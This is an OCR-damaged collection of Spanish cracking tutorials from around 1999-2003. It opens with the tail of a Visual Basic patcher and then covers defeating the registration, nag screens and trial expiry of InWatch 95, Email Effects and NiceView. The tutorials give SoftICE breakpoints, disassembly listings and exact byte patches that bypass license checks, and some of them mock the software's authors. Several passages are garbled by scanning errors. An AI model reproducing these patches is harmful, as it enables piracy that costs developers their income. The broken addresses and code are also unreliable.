nd Function // termina la funcion 

hora metamosno al código del parche mismo 


rivate Sub Command3_Click() // Cuando hagamos click en el boton parchear va a suceder... 
f Existe(Textl) Then // aqui indica que si existe toma un valor true entonces ejecutara el sgte codigo 
On Error GoTo Cerrar // si ocurre un error de ejecución salta a Cerrar 


im Tamaño As Long // tamaño sera la constante que llevará el tamaño del archivo original(*), long indica que la constante a usar es un número 
grande (xxxxxxx byte, 7 cifras) 


Tamaño = 1392692 // (*) 


f FileLen(Text1) <> Tamaño Then // filelen funcion que contiene el tamaño del archivo descrito en el textl despues dice (1F) si el tamaño del 
archivo escrito en textl es distinto(<>) a tamaño(*), entonces (THEN) nos saldra un mensaje diciéndonos que el archivo no se encuentra. 


sgBox "Archivo no Encontrado!", VbCritical, "TharZis.cl" // el mensaje, vbcritical indica el icono del messagebox( x ), el titulo 


1se // SINO (osea si filelen(textl)=tamaño 
Open Textl For Binary Access Write As +fl // abre el archivo escrito en textl para escribir en el 


ut +1, 156565, £¿H5D75 


/ Ojo acá que aqui viene un poco complicado 

UT+*1 nos abre el archivo en la linea que le indiquemos. 

pea el siguiente dato indica la linea a cambiar acá tenemos que hacer una conversión de Hexadecimal a decimal, nuestro offset es H26394 hay 
ue pasarlo a decimal¿Cómo hacemos esto? Nos vamos al calculadora de windows y colocamos la opcion hex ingresamos el offset sin la H y después 

cambiamos a dec, nos saldrá en este caso 156565 que es el número a colocar. 

¡Ahora la siguiente linea es la que vamos a cambiar, tenemos que cambiar je 745D por ¡ne 755D , entonces escribimos detras para delante en vez de 

755D colocamos 5D75 . 


ng "Programa Parcheado!", vbInformation" // el mensage que nos advierte que todo salio bien 
nd If // termina la condicion 
On Error GoTo 0 // termina verificacion de errores de ejecucion 
Es Sub // termina el evento command3_click 
lose +1 // graba los valores cambiados 
errar: // salta a cancelo si ocurria un error de ejecucion 
Eso // sino termina el programa si existe=FALSE 
nd If // termina la condicion 


'Y nada mas, ahora nos vamos a archivo/generar form1.exe ( yo le cambiaria por otro nombre y de echo se lo cambie) generamos el exe y el parche 
sta 100% funcional.. 


[Solamente tengo que recordarles que tienen que pagar por el programa si es que lo desean registrar, tenemos que colocarnos la mano en el corazon 
¡para pensar en ese pobre bruto que programó el programa con tanto sacrificio para ganar un poco de plata el cual reza para que el crack del programa 
no salga en astalavista.box.sk debido a la protección tan burda que le colocó, pobre infeliz . 


Un saludo a PrOfesor_X que hace posible la publicación de mis tutoriales , a Karpoff que lamentablemente saca su gran pagina web, la cual me 
inicio en el mundo del Cracking ,a TNT, WKT, a todos los Crackers que escriben tutos y en especial a mis lectores. 


Consultas, dudas, críticas, escribeme a tharziscl O hotmail.com 


Hackman 6.0 


Fecha: 18 de Octubre del 2001 
Tamaño: 3.80MB 

Plataforma: Win95/98/NT/2000 
Web: http://www.technologismiki.com/ 


Descargas: 9.705 


Potente editor hexadecimal y desensamblador 

Hackman es un potente editor hexadecimal y desensamblador que ofrece muchas opciones de personalización. 
Algunas de sus características más destacadas incluyen: un codificador, un decodificador, un desensamblador, 
vistas de aviso, y cinco herramientas de monitorización de código (incluyendo los formatos binario y octal). 


El desensamblador puede traducir cualquier código fuente de Pentium a código máquina. 


Mejoras en la nueva versión: 

Incluye un nuevo manejador de ficheros y un nuevo kernel de selección que es más rápido en las operaciones de 
fichero. Soporta Macros, estadísticas de código, un analizador de ficheros y un visor, todo ello totalmente 
configurable. 


Nota: 
Puedes traducir el programa al Castellano bajándote este parche oficial 


Karpoff Spanish Tutor 


Programa: 


InWatch 95 Relase V1.3a 


PROTECCION: Name / Serial 


Descripcion: Programa Para Monitorear el systema, bueno para comprobar los cambios que hacen los programas al instalarlos. 


Dificultad: 


Facilon 


DOWNLOAD: http: //members.xoom.com/ XOOM/kf karpoff/Utilidades/Installw.zip 


Herramientas: 


Softice v3x+, W32Dasm , Editor Hexadecimal 


karpoff FECHA: 11/09/99 


INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 11/09/99 


Por Karpoff ii PROYECTO 9 it 


Hola a todos/as !!! Lo primero decir que esto no va ha ser un manual como los anteriores, voy a intentar 
demostraros el poco interés que ponen la mayoría de los programadores en proteger su software, y por lo tanto 
la mierda de software que nos quieren meter. Conocéis alguna utilidad con licencia shareware que merezca la 
pena pagar¿? Yo realmente no. 


Siempre que queremos petar un programa los newbies (novatos) pensamos que tiene que ser super complicado 
encontrar el punto donde atacar al programa, generalmente queremos petarlo antes de empezar, con lo cual se 
nos cierra el cerebro y no vemos mas halla de nuestra totxa, os aseguro que si os tomáis las cosas con Calma 
y probáis a modificar en un programa todo lo que creáis que os puede beneficiar en cuanto a la limitación se 
refiere, podéis flipar, a parte de aprender muchisimo os divertiréis viendo como puede llegar a actuar el 
programa que modifiquéis. 


La víctima InWatch 95 Relase Vl.3a parece ser una utilidad para seguir instalaciones, pudiendo ver todo lo 
que se modifico con una instalación tal, y recuperando el estado anterior a la instalación. Parece que tiene 
funciones de editor y algunas cosas mas, ( el caso es que no conocía este programa y no he tenido la ocasión 
de probarlo). Lo podéis coger de: 


http://members.xoom.com/_XOOM/nakarko/inversa/proggies/Installw.zip 


Este es un programa limitado a 30 días, nos arranca con un nag para decirnos que es una versión sin registrar 
y una vez aceptado nos muestra un nuevo nag soltándonos otra vez el rollo de su limitación a 30 días. 


Ataques: vamos a sacar con el SoftlIce un numero de registro valido para el nombre que metamos, el proceso que 
voy a utilizar para capturar el S/N no es corriente, se trata de que sepáis que se puede crackear sin seguir 


el típico proceso de buscar la rutina de comprobación y a partir de hay comparar el reg falso con el valido. 


Os explico como lo haremos, se trata únicamente de buscar en la memoria el n/s valido, porque cuando un 
programa nos da el mensaje de que el serial no es valido, en ese momento todavía puede estar el reg valido en 
la memoria, claro esta que para mostrar el mensaje de error en algún punto hizo la comprobación, entonces 
rastrearemos la memoria en la ventana de datos del softice en busca del posible n/s. este es un método un 
poco pasota pero os aseguro que con muy buenos resultados, Y con el W32dasm convertiremos la ventana donde 
tenemos que escribir el nombre y el numero de registro en un generador de S/N validos, Ósea que meteremos un 
nombre cualquiera y sin meter n/s pulsaremos el botón que era para registrarnos, y nos mostrara el numero 
valido, curioso no¿? 


| ALATAKE. 


PARTE 1 BUSCAR UN S/N VALIDO, DE UNA FORMA POCO USUAL 


Herramientas Softice, “W32dasm, HEXedit, primero empezamos con el soft, ousease que hemos reiniciado nuestro ordenador 
y hemos cargado el sofice. Bien primero hacer una copia del archivo inwatch.exe para luego editarla con el hexedit, 
ahora cargamos el original con el softice, pulsamos el botón de los engranajes y nos baos al soft, F5 para vover a 
windows, aparece el primer nag, pulsamos OK y aparece el segundo nag pulsamaos OK y entramos en el programa vamos a 
register y pulsamos register now, y ya nos aparece la ventana de registro ( que luego la convertiremos en el generador 
de n/s validos) rellenamos los datos en mi caso pondré 


NAME: karpoff 


Regitration Number : 1212121212 


Y ahora tenemos que poner un breakpoint que detenga la ejecución del programa justo cuando este, o aya comparado 
nuestro numero con el valido, que breakPoint poner¿? En anteriores manuales ya explique como saber a que funciones 
externas llama un programa, en este Caso utilizamos la función messageboxexa, pues pulsamos [Ctrl+D] para entrar en el 
softice y poner nuestro breakpoint 


BPX messageboxexa 


Pulsamos nuevamente [Ctrl1+D] para volver a Windows y pulsamos OK en la ventana del registro, inmediatamente el 
programa llama a la función messageboxexa e interrumpe la ejecución del programa llevándonos directamente al softice 
exactamente en 


USER32 MESSAGEBOXEXA 


015F:BFF52E1C B135 MOV CL,35 


Lógicamente estamos dentro de user32.dll y necesitamos saber quien llamo a esta funcion desde inwatch.exe pues nada 
mas fácil pulsamos F12 y no nos muestra a papa (la rutina padre que llamo a messageboxexa) nos saca del softice a 
windows y nos muestra el mensage de que no es correcto nuestro numero, aquí es donde podemos empezar a soñar e 
imaginar y pensar con mucha paz y ciencia, bueno como decía esto ya ha hecho la comprobación y ha decidido que somos 
unos chicos/as malos/as, pero seamos aun peores, lo ultimo que hicimos en el softice fue pulsar la tecla F12 para que 
nos llevase a la rutina padre que había llamado a messageboxexa y nos saco a Windows, bueno pues en cuanto pulsemos 
aceptar en el mensaje de error iremos a parar a la rutina padre ya que esa orden todavía no se ha terminado de 
ejecutar en el softice Pulsemos aceptar y entramos al soft en 


:0042B5B2 E8891B0300 Call USER32!!MESSAGEBOXEXA --- LA RUTINA PADRE 


:0042B5B7 57 push edi --- APARECEMOS AQUÍ 


Bueno pues yo sigo pensando que el numero correcto todavía debe de estar en memoria, si pulsamos la tecla F2 veréis 
que en la parte superior del softice nos aparece un nuevo apartado con los registros y los valores que llevan 
actualmente algo así 


EAX=XXXXXXXX ESI=XXXXXXXX ECX=XXXXXXXXX ETC. ETC. ETC. 


Si pulsamos con el botón derecho del ratón sobre cualquier registro (EAX, EDX, EBX, ECX,ESI, EDI ETC.) o sobre 
cualquier dato que veáis se despliega un menú y si escogéis la opción DISPLAY veréis que en la ventana de datos ( en 
la que se muestran los Caracteres) se muestra lo que lleva la memoria en ese momento, mi idea es ir pulsando en cada 
registro y rastrear la ventana de datos hacia arriba y abajo, Y concretamente si pulsáis sobre ESP y le hacéis DISPLAY 
podéis ver en la ventana de datos y concretamente en la parte superior izquierda el numero 15757 claro veréis este 
numero si como nombre escribisteis karpoff, de haber escrito otro nombre veréis otro numero con cinco dígitos, 


seguramente en otros registros(EDX, EBP, ) también encontréis el n/s valido, solo que tendréis que rastrear 
abajo no siempre aparece a la primera, y en muchos programas este método no será valido.Bueno Pues este era 
n/s valido, queda entendido no ¿? hay muchas formas de crackear, la limitación la ponemos nosotros, echarle 
imaginación y veréis. 


Los datos del registro se guardan en el archivo C:IWINDOWSY inwatch.INI para hacer el siguiente experimento 
desregistraros, con borrar el n/s del archivo inwatch.ini ya no estaréis registrados. 


PARTE 2 Convertir la ventana de registro en un generador de S/N validos 


Pues si con una pequeña modificación en solo dos bytes, haremos que la ventana donde metemos el nombre y el 
registrarnos se convierta en un generador de números validos para el programa (curioso no¿?) 


arriba y 
nuestro 


tenéis que 


s/n para 


Bueno utilizaremos el W32dasm y un editor HEX, desensamblamos el archivo inwatch.exe y con el HEXedit editamos una 
copia de este mismo archivo, ya hemos desensamblado el archivo, sigamos los pasos tipicos buscamos el mensaje de * 


Incorrect Registration Number." Y hacemos doble clip, aparecemos en 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Ob] ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C - APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 


echemos un vistazo encima de este código para ver que hace que se imprima este mensaje. 


* Possible StringData Ref from Data Obj ->"shownumber" 


:0042B55F 680DFA4600 push 0046FAOD 


:0042B564 FF75F0O push [ebp-10] 


:0042B567 E8B4900200 call 00454620 


:0042B56C 830408 add esp, 00000008 


:0042B56F 85C0 test eax, eax 


:0042B571 742A je 0042B59D -— SI NO SALTA GENERA EL S/N 


:0042B573 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Registration Number" 


:0042B575 6818FA4600 push 0046FA18 


:0042B57A 8D45CC lea eax, dword ptr [ebp-34] 


:0042B57D 50 push eax 


:0042B57E FF37 push dword ptr [edi] 


:0042B580 E87C4E0100 call 00440401 


:0042B585 830410 add esp, 00000010 


:0042B588 FF7720 push [edi+20] 


:0042B58B 8B4720 mov eax, dword ptr [edi+20] 


:0042B58E 8B4008 mov eax, dword ptr [eax+08] 


:0042B591 FF908C000000 call dword ptr [eax+0000008C] 


:0042B597 59 pop ecx 


:0042B598 E9AS5000000 jmp 0042B642 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0042B571(C) 


:0042B59D 3B5DEC cmp ebx, dword ptr [ebp-14] 


:0042B5A0 741E je 0042B5C0 — SALTO AL MENSAJEE DE ERROR 


:0042B5A2 6A00 push 00000000 


:0042B5A4 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Ob] ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C - APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 


Bueno ya veis no¿? No voy a enrroyarme, mas bien resumiré, tenemos un salto en 


0042B5A0 si este salto se ejecuta evitaría el mensaje de error, por lo tanto nos registraría cualquier numero, para 
ello tendríamos que cambiar 


0042B5A0 741E je 0042B5C0 por 0042B5A0 EB1IE jmp 0042B5C0 


EN realidad esto nos aceptaría el s/n que metamos, incluso nos felicita con el típico Tank you for register o similar, 
pero al iniciar nuevamente el programa vemos que no mantiene el registro, que puede pasar, pues que hay otra 
comprobación o la misma pero llamado desde otro punto del programa, en cualquier caso no me centrare en buscarla eso 
os lo dejo a vosotros que esta muy fácil. 


Sigamos en 0042B571 742A je 0042B59D otro salto si os fijáis en la dirección de memoria a la que apunta vemos que si 
salta va directo al salto que hemos analizado antes , pero si lo eliminamos haciendo que no salte entra en el código 
que genera el s/n valido, y cual fue mi sorpresa al ver que si eliminas el salto convierte la ventana de registro en 
un keygen, actuando así, metemos un nombre pulsamos ok y en vez de mostrarnos el nag con el aviso de registro aceptado 
o registro fallido nos muestra un nag diciendo su numero de registro es tal ( alucinante, nunca vi un programa con 
este comportamiento) bueno para eliminar el salto 0042B571 742A je 0042B59D tendríamos que cambiar los bytes 742A por 
9090 solo tenemos que ver la dirección del offset e ir al HEXedit Offset 1BB71 cuando realizeis los cambios salvar el 
programa ( que es una copia del original claro) y veréis cuando intentéis registraros.... 


Espero que lo entendáis todo, no me he querido meter en explicaciones profundas por dos razones, una por que ya debéis 
de tener nivel suficiente para llevar a cavo todos estos cambios sin las explicaciones detalladas de los anteriores 
manuales, y dos porque en este manual lo que intento es deciros que cualquier forma de crackeo es valida, todo lo que 
se os ocurra vale no os centréis solo en los manuales, buscar nuevos métodos de ataque. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf karpofffthotmail.com URL: http: //welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


Tutorial N* 3 (correción) 


Programa: Email Effects Versión 1.6 
Descarga: http://www .sigsoftware.com 
Objetivo: Sacar todo lo que nos moleste 


Herramientas necesaria: W32Dasm, OFFset CALculator (para determinar alguna 
dirección solo si lo necesitas), Softice, Hiew (editor hexadecimal) y Resource 
Hacker. 


Dificultad: Newbie 
Fecha de corrección: 29/05/03 
Cracker: Prometeo 


Este tutorial está realizado únicamente con fines educativos, y si sé te ocurre por 
esas casualidades realiza este crack ya sea para fines económicos o personales tú 
eres el único responsable. Así que si te gusta el programa ya sabes debes 
comprarlo. 


Introducción: 


Con este programa lo que podemos hacer es crear arte ascii a partir de fotos o 
dibujos, tan solo con copiar al porta papel lo que queremos representar y luego 
pegarlo en email effects y listo. 


La manera en que funciona este software es muy simple representa caracteres en 
lugar de los pixeles del dibujo o foto. 


Tras recibir un e-mail de un lector me enteré de un error que cometí este tuto, que 
no creí haberlo cometido, sepan disculpar, pero lo que paso es que como a los 
tutorial que hago los voy realizando de a pedazos, ya que no dispongo de mucho 
tiempo libre para escribirlos de una, y al parecer en este caso, cuando retorne a 
escribir nuevamente, no continué el texto de la manera que en un principio había 


pensado. 


En la manera en que estaba quitada la nag que aparece cada ves que iniciamos el 
programa, eliminábamos del inicio la nag, pero también desde el about). 


Del error cometido se presentan dos soluciones diferentes para obtener los mismos 
resultados (la solución que pensaba colocar en este tuto en un principio y la 


segunda solución es la sugerencia que me envió el amigo Belzebu), las 
correcciones son las escritas en color verde. 


Los puntos limitantes y molesto entre otras cosas de esté programilla son: 


e Pantalla de bienvenida (darnos la bienvenida la primera ves que utilizamos 
dicho software no esta mal, es más esta muy bien pero que también nos 
digan que "Email effects es shareware - si usted lo usa, lo obliga a que 
compre una licencia (vea ayuda por detalles)", esto si es una guachada la 
primera ves que lo ejecutamos y ni siquiera lo utilizamos y ya no están 
diciendo que lo compremos?. 

e Ventana molesta que aparece cada ves que iniciamos el programa, dicha 
ventana es la misma que aparece en about del programa (esta ventana nos 
informa que dicho programa esta sin registrar y por favor lo registremos, 
además se nos informa la dirección de la pagina web de los creadores, 
también tenemos 5 botones en cual uno nos proporciona ayuda de como 
comprar el programa, los dos que le siguen a continuación distintas formas de 
compra " me parece que esto muchachos están obsesionados en que 
compremos su programa esto me esta empezando a hinchar las pelotas, 
bueno y los dos últimos botones son uno de ayuda y el otro nos quita esta 
ventana molesta. 

e Por ultimo lo que nos queda es la protección por expiración del programa 
luego de pasado los 28 días de su uso, entonces después de que cada ves 
utilicemos el software nos aparecerá una ultima ventana en que se nos 
informa que el periodo de prueba ya a finalizado y que tenemos que 
comprarlo a como de lugar, lo digo de esta manera por que no hay ninguna de 
cerrar esta ventana (salvo ctrl+alt+F4 y finalizar el proceso) o sea que la única 
alternativa que nos dan es la compra con los tres botones de compra antes 
nombrados. 


Hecha la trampa 


Como ya sé a dicho el objetivo en esté software será la de eliminar todo lo que no 
moleste o no sea de nuestro agrado, en pocas palabras modificar el ejecutable de 
manera que queda a nuestro antojo. 


Los puntos a tratar son: 


e Eliminación de pantalla de bienvenida 

e Sacar la ventana de about que aparece cada ves que se inicia el software 

e En la ventana de about eliminar todo botones relacionado con la compra del 
software + estar registrado y que aparezca nuestro nombre. 

e Eliminación de la ventana de expiración 


Creo que eso es todo bueno basta de hablar y a crackear. 


Modificando el programa víctima a nuestra medida 


En primer lugar procederemos a desensamblar al ejecutable para la posible 
identificación de alguno de los punto mencionado a tratar, ya sea por identificación 
de string ref, menu ref, dialog ref o en su defecto si encontramos alguna dirección 
interesante en el softice y con está poder analizar el código en el listado muerto. 


Para comenzar cargaremos nuestro ejecutable víctima en el loader del softice 
(siempre y cuando no hallamos ya utilizado email effects ya que si lo hemos 
utilizado no nos mostrara la caja de dialogo de bienvenida que queremos pescar 
mediante break point para su posterior eliminación, la manera de que se vuelva a 
mostrar la ventana se consigue eliminando la rama del registro 
HKEY_USERSIDEFAUL TiSoftwarelSig Software ya que es aquí donde queda 
asentado que ya fue ejecutado) y estableceremos varios break point como x ej. 
getdlgitem , dialogbox, dialoboxparama, etc. Continuamos con la ejecución del 
programa con F5 y ya estamos dentro con el break point DialogBoxParamA del 
softice en USER32.dll le damos a F12 para retornar dentro del programa y vemos 
que nos aparece la ventana que queremos eliminar, le damos al botón de OK y 
volvemos al softice si miramos por encima del call [USER32!dialogboxparama] y 
veremos un salto condicional como: 


:0040A414 85DB test ebx, ebx 


:0040A416 7428 je 0O40A440 (no jump) no se produce el salto lo que nos lleva a 
ver la mugrosa ventana que queremos quitar, como solución para evitarla es 


cambiar el salto condicional por uno incondicional. 

Bueno el segundo punto a tratar es el de sacar la ventana de about que aparece 
cada ves que se inicia el software, debemos tener especial cuidado ya que si nos 
mandamos alguna cagada esto se reflejara en la estética del about del programa 
como así también su funcionamiento. 

Mi Solución: 

Volvemos a cargar nuevamente en el loader el ejecutable y colocamos varios break 
point como por ej. getdlgitem , dialogbox,showwindow, dialoboxparama, etc. 
Presionamos F5 y caemos dentro del softice con el break point showwindow, le 
damos a F12 y aterrizamos en: 

* Reference To: USER32.ShowWindow, Ord:0265h 

| 

:00411E44 FF15E4654800 Call dword ptr [004865E4] 

:00411E4A 83C430 add esp, 00000030 <= aqui 

:00411E4D 5B pop ebx 

:00411E4E C3 ret 


El ret que vemos nos quiere decir que seguimos dentro de un call entonces o 
presionamos F12 nuevamente para retornar del call o taceamos hasta salir del call; 


:00408E76 8B6C2438 mov ebp, dword ptr [esp+38] 
:00408E7A 8B5C243C mov ebx, dword ptr [esp+3C] 
:00408E7E 8B4C2430 mov ecx, dword ptr [esp+30] 
:00408E82 890D88214200 mov dword ptr [00422188], ecx 
:00408E88 E8C38E0000 call 00411D50 


:00408E8D ESAEDEFFFF call 00406D40<=caemos aqui, el call inmediato superior 


es de donde venimos 

:00408E92 E8C99FFFFF call 00402E60 
:00408E97 890424 mov dword ptr [esp], eax 
:00408E9A 85C0 test eax, eax 

:00408E9C 0F852C010000 ¡ne 00408FCE 
:00408EA2 E829150000 call 0040A3DO 
:00408EA7 E8C41E0000 call 0040AD70 


:00408EAC 6869574545 push 45455769 


Se puede observar que una ves que salimos del call, podemos ver que es creada la 
nag a eliminar, x lo tanto la manera del eliminar esta nag es nopeando el call en 
donde aparecemos. 


Esta es la manera en que en un principio crackeé el programa, solo que cuando me 
puse a escribir el tutorial ya había pasado mucho tiempo desde que lo crackeé y 
además como el tema lo deje a medio hacer, cuando retorné a volver escribir, leí así 
no mas lo escrito y continué el texto de manera errónea. 


Tb reconozco que mi error fue el de después de haber terminado el tuto no haber 
verificado si todo lo escrito era correcto. =) 


La solución propuesta x Belzebu: 
En el W32DASM podemos ver que la llamada para hacer esa 


ventana se hace tanto en |:00407060 ,como en :00408E88. 
Si en Softice ponemos un bpx en esas 2 direcciones vermos 
que rompe en 00408E88 (Nag del principio). 


* Referenced by a CALL at Address: 
1:0041E0F2 


:00408E70 53 push ebx 

:00408E71 56 push esi 

:00408E72 55 push ebp 

:00408E73 83EC20 sub esp, 00000020 
:00408E76 8B6C2438 mov ebp, dword ptr 
[esp+38] 

:00408E7A 8B5C243C mov ebx, dword ptr 
[esp+3C] 

:00408E7E 8B4C2430 mov ecx, dword ptr 
[esp+30] 

:00408E82 890D88214200 mov dword ptr 
[00422188], ecx 

:00408E88 E8C38E0000 CALL 00411D50 ==>NOPEAR 
:00408E8D ESAEDEFFFF call 00406D40 


Bastará con modificar en 00408E88: ESC38E0000 x 
9090909090. 


El tercer punto es la eliminación de los botones de compra y lograr estar registrado, 
para ello vayamos al listado muerto en W32Dasm y nos fijamos en String ref y 
busquemos algo relacionado con el registro y encontramos: Unlicensed — 


Licensed to : 


Cliqueamos sobre Licensed to:, verificamos haciendo varios click sobre el string 
para ver si hay varios ref pero solo encontramos una en 412627 miramos un par de 
líneas arriba de esta dirección y damos con una referencia a un salto condicional en 
4125F4 tomamos nota de esta dirección y después verificaremos de que se trata. 


De la misma manera que hicimos con Licensed to: lo hacemos para Unlicensed -— y 
también encontramos la ref a un salto condicional en 4125C7 lo anotamos. A priori 
se puede decir que el salto en 4125c7 siempre se realizara lo que nos mostrara en 
la pantalla de about como Unlicensed — y el segundo salto no se producirá evitando 
que estemos Licensed to:. 


Carguemos en el loader el programa y coloquemos bpx en las dirección que 
tomamos notas y probemos todo lo dicho. Podemos ver que en el primer salto se 


cumple lo que dije x lo tanto nos lleva a estar Unlicensed — para evitar esto, 
invertimos el salto con r fl z (realizamos esto estando sobre el salto) seguimos con 
la ejecución del programa con F5 y llegamos al segundo bpx en 4125F4 que en el 
no se produce el salto pero si seguimos un poco el código podemos ver que hay un 
par de call mas abajo para repetir esta rutinas, así que también invertimos el salto al 
igual que el anterior para que si nos muestre como Licensed to:. 


Listo ahora si los cambios que realizamos en memoria lo hacemos con un editor 
hexadecimal y en el about aparecemos como Licensed to: pero nosotros queremos 
también que aparezca nuestro nombre O, para esto nos valemos de Resource 
Hacker ya que esta herramienta podremos manipular los string fácilmente e ingresar 
nuestro nombre dentro del mismo string. Para ello abrimos el ejecutable con esta 
utilidad, y nos mostrara cada recursos del software como carpetas, vamos a la 
carpeta String Table y seguimos buscando dentro de esta la sub-carpeta que 
contenga el string que diga Licensed to: y lo editamos para que lo muestre como 
Licensed to: Prometeo, le damos al botón Compile Script y salvamos los cambios. 


Ahora si ejecutamos el programa y la ventana de about la veremos como de manera 
similar a: 


Vamos llegando al fin de esté tuto solo nos que tratar la eliminación de la ventana 
de expiración a los 28 días de uso, para ello adelantemos la fecha de la compu para 
que el programa caduque luego colocamos en el loader un bpx en 
dialogboxparama, cerramos a email effects y saltara el softice ya que tendría que 
aparecer la caja de dialogo que nos indica la expiración del soft y con el bpx 
saltamos antes de está, le damos a F12 para volver el programa y nos muestra la 
ventana con tres botones le damos un click a cualquier botón y llegamos a donde 
queríamos, miramos un poco arriba y encontramos: 

:00413054 6685F6 test si, si 

:00413057 7415 je 0041306E 

:00413059 668B03 mov ax, word ptr [ebx] 

:0041305C 89442414 mov dword ptr [esp+14], eax 

:00413060 663B7C2414 cmp di, word ptr [esp+14] 


:00413065 7F07 jg 0041306E 


:00413067 663B6C2414 cmp bp, word ptr [esp+14] 

:0041306C 7D78 jge 004130E6 

Se puede ver que estos tres salto apuntan a una misma dirección y que si 
llegáramos a esta evitaríamos la dichosa ventana molesta x lo tanto con solo 


cambiar los saltos condicional x incondicional se acabaran con los problemas de 
tener que ver que ya se expiro el programa. 


Llegamos al fin de esté tuto (S 


Notas finales: 


Como se puede ver con las soluciones propuesta llegamos los dos al mismo 
lugar a donde se encontraba el problema nada mas que x diferente caminos 


=). 
Agradecimiento y saludos: Gracias Belzebu x la corrección 
El Checho un amigo 

Groovy por publicar mis tuto 


Contacto: Si hay cualquier pregunta, comentarios o sugerencias, por favor enviarme 
un e-mail a prometeo(OMdata54.com. 


Tutorial N*4 


Programa: NiceView 


Descarga: http:// WWwWw.x-screensaver.com 


Objetivo: Obtención de serial 
Herramientas necesaria: Softice ¿ke mas podríamos necesitar? 
Dificultad: Newbie 


Fecha:22/03/03 


Cracker: Prometeo 


Este tutorial está realizado únicamente con fines educativos, y si sé te ocurre por esas casualidades realiza este crack ya sea para 
fines económicos o personales tú eres el único responsable. Demás esta decir que si te gusta el programa debes comprarlo. 


Introducción: 


Wenas gente, el soft a crackear hoy es un screen saver no muy bueno a mi modesto entender. Es un screen saver ke lo ke hace es 
mostrarnos fotos de una minitas ke tan muy buenas, cada cierto cantidad de tiempo y además podemos seleccionar una de las fotos 
ke se nos muestra en pantalla para colocarla en nuestro desktop. 


Digo ke no es muy bueno este screen saver ya ke presentar fotos cada cierto cantidad de tiempo no es una idea muy original y 
además podemos encontrar en la internet fotos de este estilo de a patadas e incluso con mucha mejor calidad y encima sin tener ke 
pagar x ellas. 


Hecha la ley..... 


Para registrar este protector de pantalla solo tendremos ke colocar un password ke será siempre el mismo ya ke al usuario no le es 
requerido ningún dato para ke pueda ser generado el pass. 


Hecha la trampa 


Para empezar iniciamos el programa y clickeamos sobre el botón ke dice registrar, luego colocamos algún pass trucho ke se nos 
venga a la mente. Entramos en él el softice con ctrl+d y establecemos un break point en getwindowtexta, salimos con F5 y le damos 
al botón de ok, y ya estamos nuevamente dentro del softice; luego presionamos F12 para retornar al código del progi. Lo ke vamos a 
hacer a continuación es eliminar todos lo break point con bc * e ir poniendo break point en la posición en ke nos encontremos (x 
supuesto ke sea parte del programa), para luego presionar F12 y luego nuevamente borrar el bpx ke habíamos puesto antes y colocar 
otro bpx en la instrucción en ke estamos (repetimos este método hasta llegar al cartel de error), con lo hecho hasta el momento 
logramos colocar un bpx ke estará muy pero muy cerca de nuestro ventana de error, le damos nuevamente al botón de ok para tratar 
de registra el progi y con el ultimo bpx ke pusimos anteriormente utilizando este método caemos en : 


:0040AC4A CC lea edx, dword ptr [esp+0C] <= aterrizamos aquí 


:0040AC4E B958C14600 mov ecx, 0046C158 


:0040AC53 52 push edx 


:0040AC54 E8075F0000 call 00410B60 


:0040AC59 8B00 mov eax, dword ptr [eax] 


:0040AC5B 50 push eax <= mmmmm ke números extraños aparecen 


:0040AC5C 8B44240C mov eax, dword ptr [esp+0C]<= es movido eax 


:0040AC60 50 push eax <= si es nuestro pass trucho 


:0040AC61 E8EEAE0O200 call 00435B54 <= de seguro acá algo pasa 


:0040AC66 


:0040AC69 


:0040AC6D 


:0040AC6F 


:0040AC72 


:0040AC77 


:0040AC79 


Estando e 
traceamos 


:00435B54 


:00435B55 


:00435B57 


:00435B5A 


:00435B61 


:00435B62 


:00435B63 


:00435B64 


:00435B66 


:00435B69 


:00435B6C 


:00435B71 


:00435B72 


:00435B73 


83C408 add esp, 00000008 


8D4C240C lea ecx, dword ptr lesp+0C] 


85C0 test eax, eax 


0F94C3 sete bl 


E8B8D40300 call 0044812F 


84DB test bl, bl 


7432 je 0040ACAD <= si el salto se produce nos mostrara el mensaje de Invalid password 


la dirección:0040AC61 presionamos F8 para ingresar al call 00435B54 y una ves dentro 
con F10 y podremos ver: 


55 push ebp 


8BEC mov ebp, esp 


83EC0C sub esp, 0000000C 


833D6C0A470000 cmp dword ptr [00470A6C], 00000000 


53 push ebx 


56 push esi 


57 push edi 


7512 jne 00435B78 


FF750C push 


FF7508 push 


59 pop ecx 


59 pop ecx 


[ebp+0C] 


[ebp+08] 


E86F380000 call 004393E0 <= algo debe pasar aquí dentro 


E96C010000 jmp 00435CE4 <=si continuamos nos vamos del call 


Ingresamos nuevamente dentro del otro call con F8 en la dirección:00435B6C y traceamos con F10 x dentro de la call 004393E0, y 
podemos ver el siguiente bucle: 


:004393FC 


DACO or al, 


al <= se realiza la operación or con cada carácter del pass pero solo cuando 


se termina de comprobar el pass el contenido de al es 0 y al realizar la operación lógica or se 
activa la flag z. 


:004393FE 742E je 0043942E <= si la flag Z fue activada en la instrucción anterior, se producirá el 
salto, y nos llevara a estar registrado =) 


:00439400 8A06 mov al, byte ptr [esi]<= mueve el primer carácter del contenido de esi a al, si en el softice colocamos d 
esi vemos números y letras ¿será el serial correcto acaso? ummmmmm 


:00439402 46 inc esi <= incrementa en uno esi 


:00439403 8A27 mov ah, byte ptr [edi] <= mueve el primer carácter del contenido de edi a al, si nos fijamos el contenido 
de edi colocando en el softice d esi (siempre estando sobre la instrucción) veremos nuestro pass trucho. 


:00439405 47 inc edi<= incrementa en uno edi 
:00439406 38C4 cmp ah, al <= compara ah y al, si son iguales se activa la flag Z 


